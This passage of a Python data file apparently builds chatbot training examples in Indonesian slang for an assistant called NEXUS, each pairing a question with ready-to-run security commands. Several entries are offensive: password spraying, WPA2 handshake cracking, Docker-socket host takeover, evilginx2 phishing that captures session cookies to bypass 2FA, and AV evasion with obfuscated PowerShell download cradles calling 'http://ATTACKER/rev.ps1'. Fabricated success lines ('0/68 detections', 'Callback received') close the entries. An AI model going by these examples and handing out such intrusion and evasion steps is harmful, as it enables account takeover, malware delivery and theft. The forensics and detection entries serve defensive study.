       "Kerberoasting: 8 SPNs found. hashcat cracked 3: svc.sql:Summer2024, svc.backup:Password1, svc.web:Welcome1"),

    _e("Cara password spray yang aman tanpa trigger lockout bro?",
       ["Password spray = 1 password ke banyak user (bukan brute force 1 user)",
        "Lockout biasanya 3-5 attempt per account — spray max 1-2 per sesi!",
        "Tunggu lockout window reset sebelum spray berikutnya"],
       ["check lockout policy", "spray dengan crackmapexec", "spray Office365", "spray Okta"],
       ["# Check lockout policy dulu!",
        "crackmapexec smb DC_IP -u user -p pass --pass-pol",
        "# SMB password spray",
        "crackmapexec smb DC_IP -u users.txt -p 'Summer2024!' --continue-on-success",
        "crackmapexec smb DC_IP -u users.txt -p 'Welcome1' --continue-on-success",
        "# Tunggu 30 menit sebelum spray berikutnya!",
        "# Office365 spray",
        "python3 o365spray.py --spray -U users.txt -P passwords.txt --count 1 --lockout 1 --domain target.com",
        "# OWA spray",
        "ruler --domain target.com brute --users users.txt --passwords passwords.txt --delay 0 --verbose"],
       [("crackmapexec", "SMB password spray"),
        ("o365spray", "Office365 password spray")],
       "PENTING: --continue-on-success agar crackmapexec lanjut meski ada yang berhasil",
       "CyberHackSecurity: spray max 1 password per 30 menit — lebih aman dari lockout. Sabar bro! 😄",
       "professional",
       "Password spray 'Summer2024!': 5 hits dari 200 users. No lockout triggered. Lateral movement ready."),
]

# ─── 7. WIRELESS ─────────────────────────────────────────────────────────────
WIRELESS7 = [
    _e("Bro cara capture WPA2 handshake dan crack pakai hashcat yang bener?",
       ["Aircrack suite untuk capture, hashcat untuk crack — ini combo paling efektif!",
        "Handshake format: .cap dari airodump, convert ke .hc22000 untuk hashcat",
        "hashcat mode 22000 = WPA2 (lebih baru dari 2500)"],
       ["monitor mode", "capture handshake", "deauth client", "convert dan crack"],
       ["# Setup monitor mode",
        "airmon-ng check kill",
        "airmon-ng start wlan0",
        "# Scan networks",
        "airodump-ng wlan0mon",
        "# Target specific network",
        "airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon",
        "# Deauth client (di terminal lain)",
        "aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon",
        "# Convert ke hashcat format",
        "hcxpcapngtool -o capture.hc22000 capture-01.cap",
        "# Crack dengan hashcat",
        "hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt",
        "hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt -r best64.rule",
        "# Stop monitor mode",
        "airmon-ng stop wlan0mon"],
       [("airmon-ng", "monitor mode"), ("airodump-ng", "capture"),
        ("aireplay-ng", "deauth"), ("hashcat", "WPA2 cracking")],
       "hcxpcapngtool convert .cap ke .hc22000 — hashcat mode 22000 lebih baru dari 2500",
       "CyberHackSecurity: WPA2 crack hanya untuk test WiFi sendiri atau authorized wireless assessment!",
       "professional",
       "WPA2 handshake captured setelah 3 deauth. hashcat -m 22000: KEY FOUND! [CyberHack2024]"),

    _e("Cara scan dan analyze nearby WiFi networks dengan kismet bro?",
       ["Kismet untuk passive wireless monitoring — gak mengirim packet sama sekali!",
        "Detect: WiFi, Bluetooth, Zigbee, tergantung adapter",
        "Output: database SQLite yang bisa dianalisis"],
       ["start kismet", "browse via web UI", "analyze database", "capture packets"],
       ["# Start kismet",
        "kismet -c wlan0",
        "# Kismet dengan multiple sources",
        "kismet -c wlan0 -c wlan1",
        "# Web UI: http://localhost:2501",
        "# Atau headless",
        "kismet --no-ncurses",
        "# Analyze kismet database",
        "sqlite3 Kismet-*.kismet",
        "sqlite3 Kismet-*.kismet 'SELECT devmac, type, strongest_signal FROM devices ORDER BY strongest_signal DESC LIMIT 20'",
        "# Convert pcap untuk wireshark",
        "kis2pcap Kismet-*.kismet -o output.pcap"],
       [("kismet", "passive wireless monitoring dan device tracking")],
       "kismet web UI di localhost:2501 — password default kismet:kismet, ganti segera!",
       "CyberHackSecurity: kismet detect hidden SSIDs, rogue APs, dan probe requests dari devices",
       "analytical",
       "Kismet: 34 networks detected, 12 hidden SSIDs, 2 suspected Evil Twin APs, 156 client devices tracked."),
]

# ─── 8. CLOUD ────────────────────────────────────────────────────────────────
CLOUD7 = [
    _e("Bro cara audit AWS secara comprehensive pakai scout suite?",
       ["Scout Suite open source cloud security auditing tool",
        "Support: AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud",
        "Output: HTML report dengan findings per service"],
       ["install", "run audit", "review findings", "specific service"],
       ["pip install scoutsuite",
        "# AWS audit",
        "scout aws",
        "scout aws --profile production",
        "scout aws --regions us-east-1,eu-west-1",
        "scout aws --services iam s3 ec2 rds",
        "# Azure audit",
        "az login",
        "scout azure --cli",
        "# GCP audit",
        "scout gcp --user-account",
        "# Buka report",
        "cd scoutsuite-report && python3 -m http.server 8080"],
       [("scoutsuite", "multi-cloud security auditing tool")],
       "scout aws --services filter hanya service tertentu — lebih cepet kalau mau focused audit",
       "CyberHackSecurity: scout suite check 150+ security rules per cloud provider otomatis",
       "professional",
       "Scout Suite AWS: 23 critical findings. S3 public buckets: 3, IAM no MFA: 12 users, SG 0.0.0.0/0: 8 rules."),

    _e("Cara pakai pacu untuk AWS post-exploitation yang proper bro?",
       ["Pacu adalah AWS exploitation framework — kayak metasploit tapi untuk AWS",
        "Modules: enumeration, privilege escalation, persistence, exfiltration",
        "Hanya untuk authorized cloud penetration testing!"],
       ["setup pacu", "import keys", "enumerate permissions", "privesc scan"],
       ["# Install",
        "git clone https://github.com/RhinoSecurityLabs/pacu",
        "cd pacu && pip install -r requirements.txt",
        "python3 pacu.py",
        "# Import AWS keys",
        "Pacu > import_keys default",
        "Pacu > import_keys --access-key AKIA... --secret-key ...",
        "# Enumerate permissions",
        "Pacu > run iam__enum_permissions",
        "Pacu > run iam__enum_users_roles_policies_groups",
        "# Privilege escalation scan",
        "Pacu > run iam__privesc_scan",
        "# Enumerate resources",
        "Pacu > run ec2__enum",
        "Pacu > run s3__enum",
        "Pacu > run lambda__enum"],
       [("pacu", "AWS exploitation framework")],
       "pacu run iam__privesc_scan detect 20+ AWS privilege escalation techniques otomatis",
       "CyberHackSecurity: pacu log semua actions ke ~/.local/share/pacu/log/ — bukti untuk report",
       "professional",
       "Pacu: iam:PassRole privesc confirmed. Lambda function deployed. S3 data exfil possible via GetObject."),

    _e("Gimana cara detect dan exploit container escape dari Docker bro?",
       ["Container escape = keluar dari container ke host system",
        "Vulnerable conditions: privileged container, mounted docker socket, capabilities",
        "Check dulu kondisi container sebelum exploit"],
       ["check container privileges", "escape via docker socket", "escape via privileged", "cap exploit"],
       ["# Check apakah privileged",
        "cat /proc/1/status | grep -i cap",
        "# Cek mounted volumes",
        "mount | grep docker",
        "ls -la /var/run/docker.sock 2>/dev/null",
        "# Escape via Docker socket (paling common)",
        "docker -H unix:///var/run/docker.sock run -it --rm -v /:/mnt alpine chroot /mnt sh",
        "# Escape via privileged container",
        "# Jika privileged, mount host filesystem",
        "fdisk -l",
        "mount /dev/sda1 /mnt",
        "chroot /mnt",
        "# Check dangerous capabilities",
        "capsh --print | grep Current",
        "# CAP_SYS_ADMIN escape",
        "mount -t cgroup -o rdma cgroup /tmp/cgrp"],
       [("docker", "container escape via socket atau privileged mode")],
       "Docker socket mount adalah misconfiguration paling common — /var/run/docker.sock di container = host takeover",
       "CyberHackSecurity: container escape dalam K8s cluster bisa compromise seluruh node dan cluster!",
       "professional",
       "Container escape successful via docker socket. Host filesystem mounted. Root shell on host achieved."),
]

# ─── 9. CRYPTO ───────────────────────────────────────────────────────────────
CRYPTO7 = [
    _e("Bro cara crack bcrypt hash yang kuat itu gimana? Mungkin ga?",
       ["bcrypt itu hash yang didesain lambat — sengaja susah di-crack!",
        "hashcat mode 3200 untuk bcrypt, tapi SANGAT lambat",
        "Strategi: wordlist dulu, jangan brute force, pakai GPU kalau ada"],
       ["identify hash", "crack dengan hashcat", "pakai rules", "estimasi waktu"],
       ["# Identify hash",
        "echo '$2y$10$examplehashhere' | hashid",
        "# hashcat bcrypt (mode 3200) — PERINGATAN: sangat lambat!",
        "hashcat -m 3200 bcrypt_hashes.txt /usr/share/wordlists/rockyou.txt",
        "hashcat -m 3200 bcrypt_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule",
        "# Cek progress",
        "hashcat -m 3200 bcrypt_hashes.txt --status",
        "# Estimasi: RTX 3090 = ~4000 hash/s untuk bcrypt cost 10",
        "# rockyou.txt 14M passwords = ~1 jam dengan GPU kuat",
        "# John the Ripper untuk bcrypt",
        "john --format=bcrypt bcrypt_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt"],
       [("hashcat", "GPU bcrypt cracking"),
        ("john", "CPU bcrypt cracking")],
       "bcrypt cost factor 10 = 1000x lebih lambat dari MD5 — sengaja didesain begitu!",
       "CyberHackSecurity: bcrypt susah di-crack bukan berarti impossible — weak password tetap bisa crack dalam hitungan jam",
       "analytical",
       "bcrypt crack: rockyou.txt 14M passwords, GPU RTX 3080. 3 hours later: admin:password123 cracked!"),

    _e("Cara pakai openssl untuk encrypt decrypt file dan generate certs bro?",
       ["OpenSSL Swiss Army knife untuk cryptography operations",
        "Encrypt/decrypt files, generate keys, create certificates, inspect SSL",
        "Penting untuk understand crypto sebelum bisa break-nya"],
       ["encrypt file", "generate key pair", "create self-signed cert", "inspect SSL cert"],
       ["# Encrypt file",
        "openssl enc -aes-256-cbc -salt -in plaintext.txt -out encrypted.bin -k 'passphrase'",
        "# Decrypt",
        "openssl enc -aes-256-cbc -d -in encrypted.bin -out decrypted.txt -k 'passphrase'",
        "# Generate RSA key pair",
        "openssl genrsa -out private.key 4096",
        "openssl rsa -in private.key -pubout -out public.key",
        "# Create self-signed certificate",
        "openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes",
        "# Inspect SSL certificate",
        "openssl s_client -connect target.com:443 </dev/null 2>/dev/null | openssl x509 -text",
        "# Check cert expiry",
        "echo | openssl s_client -servername target.com -connect target.com:443 2>/dev/null | openssl x509 -noout -dates"],
       [("openssl", "cryptographic operations dan certificate management")],
       "openssl s_client -connect bisa inspect SSL cert langsung tanpa browser — useful di server",
       "CyberHackSecurity: openssl req -x509 -nodes flag penting — tanpa itu key di-encrypt dan butuh passphrase tiap kali",
       "professional",
       "openssl: 4096-bit RSA key generated. Self-signed cert created. Target cert expires in 7 days (alert!)."),
]

# ─── 10. DEFENSE ─────────────────────────────────────────────────────────────
DEFENSE7 = [
    _e("Bro cara setup suricata IDS untuk monitoring network traffic?",
       ["Suricata adalah network IDS/IPS open source yang powerful",
        "Bisa analyze traffic secara real-time dan generate alerts",
        "Rules compatible dengan Snort rules"],
       ["install suricata", "update rules", "configure interface", "run dan monitor"],
       ["apt-get install suricata",
        "# Update rules",
        "suricata-update",
        "suricata-update list-sources",
        "suricata-update enable-source et/open",
        "suricata-update",
        "# Test config",
        "suricata -T -c /etc/suricata/suricata.yaml",
        "# Run pada interface",
        "suricata -c /etc/suricata/suricata.yaml -i eth0",
        "# Run pada pcap file",
        "suricata -c /etc/suricata/suricata.yaml -r capture.pcap",
        "# Monitor alerts",
        "tail -f /var/log/suricata/fast.log",
        "cat /var/log/suricata/eve.json | jq 'select(.event_type==\"alert\")'"],
       [("suricata", "network IDS/IPS threat detection")],
       "suricata-update enable-source et/open untuk Emerging Threats rules — gratis dan terus diupdate",
       "CyberHackSecurity: suricata eve.json format JSON — mudah di-parse dan integrate ke SIEM",
       "professional",
       "Suricata running on eth0. et/open rules loaded: 34k rules. First alert: ET SCAN Nmap from 10.0.0.1"),

    _e("Cara buat dan deploy Sigma rules untuk threat hunting bro?",
       ["Sigma adalah generic SIEM rule format — tulis sekali, convert ke semua SIEM",
        "Convert ke: Splunk, ElasticSearch, QRadar, Azure Sentinel",
        "sigmac atau sigma-cli untuk conversion"],
       ["install sigma-cli", "buat rule", "convert ke SIEM", "test rule"],
       ["pip install sigma-cli",
        "# Install backends",
        "sigma plugin install splunk",
        "sigma plugin install elasticsearch",
        "# Buat custom Sigma rule",
        "cat > detect_mimikatz.yml << 'EOF'\ntitle: Mimikatz Detected\nid: 06d71506-7beb-4f22-8888-e2e5e2ca7fd8\nstatus: stable\ndescription: Detects Mimikatz execution\nreferences:\n  - https://github.com/gentilkiwi/mimikatz\nauthor: CyberHackSecurity\nlogsource:\n  category: process_creation\n  product: windows\ndetection:\n  selection:\n    CommandLine|contains:\n      - 'sekurlsa::'\n      - 'kerberos::'\n      - 'privilege::debug'\n  condition: selection\nfalsepositives:\n  - Security testing\nlevel: critical\nEOF",
        "# Convert ke Splunk",
        "sigma convert -t splunk detect_mimikatz.yml",
        "# Convert ke ElasticSearch",
        "sigma convert -t elasticsearch detect_mimikatz.yml"],
       [("sigma-cli", "convert Sigma rules ke berbagai SIEM formats")],
       "Sigma rule level: informational/low/medium/high/critical — pakai critical untuk malware detection",
       "CyberHackSecurity: Sigma rules bisa di-share antar SOC team tanpa peduli SIEM yang dipakai",
       "professional",
       "Sigma rule deployed ke Splunk. First hit dalam 2 jam: Mimikatz detected di workstation ACCOUNTING-PC-01."),

    _e("Bro gimana cara setup honeypot untuk trap attacker?",
       ["Honeypot adalah sistem jebakan yang terlihat seperti target real",
        "Detect attacker sebelum mereka sampai ke asset beneran",
        "Types: low-interaction (emulasi) dan high-interaction (real system)"],
       ["deploy honeypot", "configure logging", "alert setup", "analyze attacker behavior"],
       ["# Install honeyd (low interaction)",
        "apt-get install honeyd",
        "# Atau cowrie (SSH honeypot) — paling populer",
        "git clone https://github.com/cowrie/cowrie",
        "cd cowrie && pip install -r requirements.txt",
        "cp cowrie.cfg.dist cowrie.cfg",
        "# Edit config: listen port 2222, fake hostname",
        "bin/cowrie start",
        "# Monitor activity",
        "tail -f var/log/cowrie/cowrie.log",
        "# T-Pot (all-in-one honeypot platform)",
        "git clone https://github.com/telekom-security/tpotce",
        "cd tpotce && sudo ./install.sh",
        "# HoneyDB untuk threat intel",
        "pip install honeydb"],
       [("cowrie", "SSH/Telnet honeypot"),
        ("honeyd", "low-interaction network honeypot")],
       "Cowrie log semua command yang diketik attacker — berguna untuk threat intel dan malware sample collection",
       "CyberHackSecurity: honeypot di network segment yang visible dari internet — pasti ada yang nyentuh dalam hitungan jam!",
       "professional",
       "Cowrie honeypot: 47 connection attempts dalam 6 jam. Attacker commands logged: wget malware, add backdoor user."),
]

# ─── 11. EVASION ─────────────────────────────────────────────────────────────
EVASION7 = [
    _e("Cara test apakah payload kita akan di-detect AV sebelum deploy bro?",
       ["DefenderCheck dan AMSITrigger untuk test deteksi sebelum eksekusi",
        "Better to test dulu daripada langsung ketahuan!",
        "Modify payload sampai bypass, baru deploy ke target"],
       ["check dengan defendercheck", "amsi trigger scan", "obfuscate payload", "retest"],
       ["# DefenderCheck",
        "DefenderCheck.exe payload.exe",
        "DefenderCheck.exe payload.ps1",
        "# AMSITrigger untuk PowerShell",
        "AmsiTrigger.exe -i payload.ps1",
        "AmsiTrigger.exe -i payload.ps1 -f 3",
        "# Invoke-Obfuscation untuk PowerShell obfuscation",
        "Import-Module Invoke-Obfuscation",
        "Invoke-Obfuscation",
        "# VirusTotal check (hati-hati: upload = public!)",
        "curl -X POST 'https://www.virustotal.com/api/v3/files' -H 'x-apikey: API_KEY' -F 'file=@payload.exe'",
        "# Better: check hash saja",
        "sha256sum payload.exe",
        "curl 'https://www.virustotal.com/api/v3/files/HASH' -H 'x-apikey: API_KEY'"],
       [("DefenderCheck", "test Windows Defender detection"),
        ("AmsiTrigger", "identify AMSI-triggering strings")],
       "JANGAN upload payload ke VirusTotal langsung — hash-nya keindex publik dan AV vendor dapat sample!",
       "CyberHackSecurity: DefenderCheck highlight string yang trigger AV — hapus/obfuscate string tersebut",
       "professional",
       "DefenderCheck: 3 strings trigger Defender. After obfuscation: 0/68 AV detections. Payload clean."),

    _e("Gimana cara bypass Windows Defender pakai payload yang di-obfuscate bro?",
       ["Obfuscation mengubah signature payload tanpa mengubah functionality",
        "Teknik: encoding (base64, hex), encryption, variable substitution, string splitting",
        "Shellter dan Veil untuk executable obfuscation"],
       ["string obfuscation", "base64 encoding", "shellter untuk exe", "test hasil"],
       ["# PowerShell string splitting",
        "$cmd = 'I'+'EX'+'(Ne'+'w-Ob'+'ject Ne'+'t.We'+'bCl'+'ient).Do'+'wnl'+'oadStr'+'ing(\"http://ATTACKER/ps.ps1\")'",
        "# Base64 encode PowerShell",
        "echo 'IEX(New-Object Net.WebClient).DownloadString(\"http://ATTACKER/rev.ps1\")' | iconv -t UTF-16LE | base64 -w 0",
        "powershell -enc BASE64_OUTPUT",
        "# Shellter untuk PE injection",
        "shellter",
        "# Pilih: A (auto), PE file, payload type",
        "# Veil Framework",
        "veil",
        "# Pilih Evasion → payload type → generate"],
       [("shellter", "PE file obfuscation dan payload injection"),
        ("veil", "AV evasion payload generator")],
       "PowerShell -enc flag execute base64-encoded command — banyak EDR bypass dengan ini karena historical reasons",
       "CyberHackSecurity: evasion technique terus berkembang — AV update rules, kita update technique. Cat and mouse! 😄",
       "professional",
       "Shellter: payload injected ke putty.exe. 0/68 VirusTotal detections. Callback received dari target."),
]

# ─── 12. FORENSICS ───────────────────────────────────────────────────────────
FORENSICS7 = [
    _e("Bro cara pakai volatility3 yang bener untuk Windows memory analysis?",
       ["volatility3 syntax: python3 vol.py -f MEMORY_FILE PLUGIN — simple!",
        "TIDAK ada profile di v3 — auto-detect OS",
        "Plugins: windows.pslist, windows.netscan, windows.malfind, windows.dumpfiles"],
       ["basic info", "list proses", "network connections", "detect injected code", "dump suspicious"],
       ["# Basic info",
        "python3 vol.py -f memory.dmp windows.info",
        "# List processes",
        "python3 vol.py -f memory.dmp windows.pslist",
        "python3 vol.py -f memory.dmp windows.pstree",
        "python3 vol.py -f memory.dmp windows.cmdline",
        "# Network connections",
        "python3 vol.py -f memory.dmp windows.netscan",
        "python3 vol.py -f memory.dmp windows.netstat",
        "# Detect injected code (PENTING untuk malware!)",
        "python3 vol.py -f memory.dmp windows.malfind",
        "# Dump suspicious process",
        "python3 vol.py -f memory.dmp windows.dumpfiles --pid 1234",
        "python3 vol.py -f memory.dmp windows.memmap --pid 1234 --dump",
        "# Registry hives",
        "python3 vol.py -f memory.dmp windows.registry.hivelist",
        "python3 vol.py -f memory.dmp windows.registry.printkey --key 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run'"],
       [("volatility3", "Windows/Linux memory forensics framework")],
       "volatility3 auto-detect OS — tidak perlu --profile seperti v2. Jauh lebih simple!",
       "CyberHackSecurity: windows.malfind adalah plugin terpenting untuk detect malware injection di memory",
       "professional",
       "Volatility3: 87 processes. malfind: svchost.exe PID 1234 injected code detected. C2: 185.x.x.x:443"),

    _e("Cara timeline forensics dengan plaso dan log2timeline bro?",
       ["Plaso/log2timeline create super-timeline dari semua artifacts",
        "Parse: Windows event logs, browser history, file system, registry, prefetch",
        "Output bisa di-filter dengan psort"],
       ["create timeline", "filter timeline", "analyze dengan timesketch"],
       ["# Install plaso",
        "apt-get install plaso",
        "# Create super-timeline dari disk image",
        "log2timeline.py --storage-file timeline.plaso disk.img",
        "# Create timeline dari folder",
        "log2timeline.py --storage-file timeline.plaso /path/to/evidence/",
        "# Filter dan export ke CSV",
        "psort.py -o l2tcsv -w timeline.csv timeline.plaso",
        "# Filter by time range",
        "psort.py -o l2tcsv timeline.plaso 'date > 2024-01-01 AND date < 2024-01-31' -w filtered.csv",
        "# Upload ke Timesketch untuk collaborative analysis",
        "timesketch_import_client.py --host localhost --timeline_name investigation timeline.plaso"],
       [("log2timeline", "create forensic super-timeline"),
        ("psort", "filter dan export timeline")],
       "psort filter by date range penting untuk incident response — focus ke timeframe attack",
       "CyberHackSecurity: super-timeline dari disk image include SEMUA artifacts — browser, email, USB, network",
       "analytical",
       "Plaso: 2.3M events dari disk image. Attack timeline: 14:23 initial access, 14:31 privesc, 14:45 exfil."),
]

# ─── 13. MALWARE ─────────────────────────────────────────────────────────────
MALWARE7 = [
    _e("Bro cara reverse engineering malware dengan ghidra yang proper?",
       ["Ghidra adalah NSA-developed reverse engineering tool — gratis dan powerful!",
        "Decompile binary ke pseudo-C code yang bisa dibaca",
        "Analyze: function calls, strings, imports, control flow"],
       ["import binary", "analyze", "decompile functions", "find strings", "rename untuk clarity"],
       ["# Start Ghidra",
        "ghidraRun",
        "# Atau via command line (headless analysis)",
        "analyzeHeadless /tmp/ghidra_project ProjectName -import malware.exe -postScript PrintTree.java",
        "# Via Python script (Jython)",
        "# Di Ghidra Script Manager:",
        "# Find strings",
        "# Window → Defined Strings → search suspicious strings",
        "# Analyze imports (DLL, functions)",
        "# Window → Symbol Table → filter by type External",
        "# Find main function",
        "# Search → For Strings → 'main'",
        "# Decompile suspicious function",
        "# Klik function → Decompile (tekan D atau F)",
        "# Headless decompile semua functions",
        "analyzeHeadless /tmp/ghidra_project Proj -process malware.exe -postScript DecompileAllFunctions.java -scriptPath /path/to/scripts"],
       [("ghidra", "binary reverse engineering dan decompilation")],
       "Ghidra headless mode untuk batch analysis tanpa GUI — cocok untuk server-based malware analysis",
       "CyberHackSecurity: rename functions dan variables di Ghidra saat analisis — bikin jauh lebih mudah dipahami",
       "professional",
       "Ghidra: 234 functions decompiled. C2 URL hardcoded: http://evil.com/c2. RC4 key: 0xDEADBEEF found."),

    _e("Gimana cara analisis behavior malware dengan cuckoo sandbox bro?",
       ["Cuckoo sandbox automated dynamic malware analysis",
        "Monitor: file ops, registry, network, process injection, API calls",
        "Submit via web UI atau API, report JSON/HTML"],
       ["submit sample", "monitor analysis", "review report", "extract IOCs"],
       ["# Submit via API",
        "curl -F file=@malware.exe http://localhost:8090/tasks/create/file",
        "# Submit URL",
        "curl -F url='http://malicious.com/malware.exe' http://localhost:8090/tasks/create/url",
        "# Check task status",
        "curl http://localhost:8090/tasks/view/1",
        "# Get report",
        "curl http://localhost:8090/tasks/report/1 -o report.json",
        "# Extract IOCs dari report",
        "cat report.json | jq '.network.hosts[]'",
        "cat report.json | jq '.network.dns[]'",
        "cat report.json | jq '.dropped[].md5'",
        "# CAPE sandbox (advanced cuckoo fork)",
        "python3 utils/submit.py malware.exe",
        "python3 utils/submit.py malware.exe --options 'free=yes,procmemdump=yes'"],
       [("cuckoo", "automated malware sandbox analysis"),
        ("cape", "advanced malware analysis dengan config extraction")],
       "CAPE sandbox bisa extract malware config — C2 IPs, mutex, encryption keys otomatis!",
       "CyberHackSecurity: cuckoo sandbox butuh Windows VM sebagai analysis guest — setup dulu sebelum submit",
       "analytical",
       "Cuckoo: ransomware sample. Network: beaconing ke 45.x.x.x:443 tiap 60s. Files: 2847 files encrypted."),
]

# ─── 14. SOCIAL ──────────────────────────────────────────────────────────────
SOCIAL7 = [
    _e("Cara setup phishing campaign yang proper dengan evilginx2 bro?",
       ["Evilginx2 adalah man-in-the-middle phishing framework",
        "Bypass 2FA dengan capture session cookies langsung",
        "Butuh domain dan VPS untuk deploy"],
       ["install evilginx", "setup phishlet", "configure domain", "launch campaign"],
       ["# Install",
        "apt-get install golang",
        "git clone https://github.com/kgretzky/evilginx2",
        "cd evilginx2 && make",
        "# Run evilginx",
        "./evilginx2 -p phishlets/ -developer",
        "# Config domain dan IP",
        "config domain evilginx.target-company.com",
        "config ip YOUR_VPS_IP",
        "# Enable phishlet (contoh: o365)",
        "phishlets hostname o365 login.microsoftonline.evilginx.target-company.com",
        "phishlets enable o365",
        "# Buat lure URL",
        "lures create o365",
        "lures get-url 0",
        "# Monitor sessions",
        "sessions",
        "sessions 0"],
       [("evilginx2", "adversary-in-the-middle phishing framework dengan 2FA bypass")],
       "evilginx2 -developer mode untuk testing lokal tanpa setup DNS publik",
       "CyberHackSecurity: evilginx phishing hanya untuk authorized red team assessment — wajib izin tertulis!",
       "professional",
       "Evilginx2: 3 victims clicked lure. 2 credentials captured dengan session cookies. 2FA bypassed successfully."),

    _e("Bro cara phishing awareness testing dengan GoPhish yang bener?",
       ["GoPhish open source phishing simulation untuk security awareness",
        "Track: email open, link click, credential submission",
        "Hasilnya untuk training dan report ke management"],
       ["setup gophish", "buat template", "buat campaign", "monitor dan report"],
       ["# Start GoPhish",
        "./gophish",
        "# Default: https://localhost:3333 (admin), http://localhost:80 (phishing)",
        "# GANTI DEFAULT PASSWORD: admin/gophish",
        "# Setup SMTP (sending profile)",
        "# Settings → Sending Profiles → new",
        "# Email template",
        "# Email Templates → new → import email dari real phishing sample",
        "# Landing page",
        "# Landing Pages → new → import site target.com",
        "# Target list",
        "# Users & Groups → new → import CSV: First,Last,Email,Position",
        "# Launch campaign",
        "curl -k -X POST 'https://localhost:3333/api/campaigns/' \\",
        "  -H 'Authorization: Bearer API_KEY' \\",
        "  -H 'Content-Type: application/json' \\",
        "  -d @campaign.json",
        "# Get results",
        "curl -k 'https://localhost:3333/api/campaigns/1/results' -H 'Authorization: Bearer API_KEY'"],
       [("gophish", "phishing simulation untuk security awareness testing")],
       "GoPhish tracking pixel di email detect open rate — bahkan yang tidak klik link!",
       "CyberHackSecurity: phishing simulation harus ada izin tertulis management — ini latihan, bukan attack!",
       "professional",
       "GoPhish campaign 100 targets: Open 72%, Click 34%, Credential submit 18%. Training needed for 18 users."),
]

# ─── 15. IOT ─────────────────────────────────────────────────────────────────
IOT7 = [
    _e("Bro cara audit firmware IoT device yang proper pakai binwalk dan EMBA?",
       ["Firmware analysis: extract → analyze filesystem → cari hardcoded secrets",
        "binwalk untuk extract, EMBA untuk automated comprehensive analysis",
        "Cari: default passwords, backdoors, hardcoded keys, old vulnerable libraries"],
       ["download firmware", "extract dengan binwalk", "analyze filesystem", "EMBA scan"],
       ["# Download firmware dari vendor site atau extract dari device",
        "# Extract dengan binwalk",
        "binwalk -e firmware.bin",
        "binwalk -Me firmware.bin",
        "ls -la _firmware.bin.extracted/",
        "# Cari credentials",
        "find _firmware.bin.extracted/ -name 'passwd' -o -name 'shadow' 2>/dev/null | xargs cat",
        "find _firmware.bin.extracted/ -type f | xargs grep -l 'password' 2>/dev/null",
        "strings firmware.bin | grep -iE 'password|admin|root|secret|key|token'",
        "# EMBA comprehensive analysis",
        "emba -f firmware.bin -l emba_output/ -s",
        "emba -f firmware.bin -l emba_output/ -e",
        "# firmwalker untuk quick password search",
        "git clone https://github.com/craigz28/firmwalker",
        "bash firmwalker.sh _firmware.bin.extracted/ firmwalker_output.txt"],
       [("binwalk", "firmware extraction"),
        ("emba", "comprehensive firmware security analysis"),
        ("firmwalker", "firmware credential hunting")],
       "emba -e mode extract dulu sebelum analyze — lebih comprehensive dari -s (static only)",
       "CyberHackSecurity: 70% IoT firmware punya hardcoded credentials atau private keys — seriously! 😱",
       "professional",
       "Firmware analysis: squashfs extracted. Found: root:admin123, SSL private key, Telnet enabled by default."),

    _e("Gimana cara test keamanan protokol Modbus di ICS/SCADA environment bro?",
       ["Modbus adalah protokol industrial yang sering gak punya authentication",
        "Tools: mbtget, pymodbus, ModbusPal untuk testing",
        "HATI-HATI: di real ICS, write commands bisa cause physical damage!"],
       ["discover modbus devices", "read coils/registers", "write test (authorized only)", "monitor traffic"],
       ["# Scan untuk Modbus devices",
        "nmap -p 502 192.168.1.0/24 --open",
        "# Read dengan mbtget",
        "mbtget -t 1 -r 1 -n 10 192.168.1.100",
        "# Python pymodbus",
        "pip install pymodbus",
        "python3 -c \"from pymodbus.client import ModbusTcpClient; c=ModbusTcpClient('192.168.1.100'); c.connect(); r=c.read_coils(0,10); print(r.bits)\"",
        "# Read holding registers",
        "python3 -c \"from pymodbus.client import ModbusTcpClient; c=ModbusTcpClient('192.168.1.100'); c.connect(); r=c.read_holding_registers(0,10); print(r.registers)\"",
        "# Wireshark filter untuk Modbus",
        "tshark -i eth0 -f 'tcp port 502' -w modbus_capture.pcap",
        "# PERINGATAN: Jangan write ke real ICS tanpa izin penuh!"],
       [("mbtget", "Modbus protocol testing"),
        ("pymodbus", "Python Modbus client library")],
       "MODBUS tidak ada authentication — siapapun di network bisa read/write! Default port 502",
       "CyberHackSecurity: ICS/SCADA security testing butuh koordinasi ketat dengan operator — salah command bisa bahaya fisik!",
       "professional",
       "Modbus: 3 PLCs found, no authentication. Coils status readable. PERINGATAN: Write test skipped (real environment)."),

    _e("Cara test keamanan Zigbee dan Z-Wave protokol di smart home bro?",
       ["Zigbee dan Z-Wave adalah protokol wireless untuk IoT/smart home",
        "Tools: KillerBee (Zigbee), Z-Wave sniffer dengan RTL-SDR",
        "Attack: sniffing, replay, jamming, key extraction"],
       ["sniff Zigbee traffic", "capture keys", "replay attacks", "analyze packets"],
       ["# KillerBee untuk Zigbee",
        "pip install killerbee",
        "# Scan Zigbee networks",
        "zbstumbler",
        "# Capture Zigbee packets",
        "zbdump -f capture.pcap -c 11",
        "# Replay captured packet",
        "zbreplay -f capture.pcap",
        "# RTL-SDR untuk Z-Wave sniffing",
        "# Install GNU Radio + Z-Wave module",
        "gr-zwave",
        "# Scapy untuk Zigbee packet crafting",
        "from scapy.all import *",
        "from scapy.layers.dot15d4 import *",
        "pkt = Dot15d4FCS()/Dot15d4Data()/ZigbeeNWK()/ZigbeeAppDataPayload()",
        "sendp(pkt, iface='wpan0')"],
       [("killerbee", "Zigbee security testing suite"),
        ("scapy", "packet crafting untuk Zigbee/Z-Wave")],
       "KillerBee butuh compatible Zigbee adapter: RZUSBSTICK, ApiMote, Atmel RZ USB Stick",
       "CyberHackSecurity: banyak smart home devices pakai Zigbee default channel 11 — mudah di-sniff!",
       "analytical",
       "KillerBee: 3 Zigbee networks found. Network key captured via join process monitoring. Traffic decrypted."),
]

# ── DPO Personality Data (biar NEXUS bisa ngobrol santai) ────────────────────
PERSONALITY7 = [
    _e("Hei NEXUS, lo itu sebenernya siapa sih?",
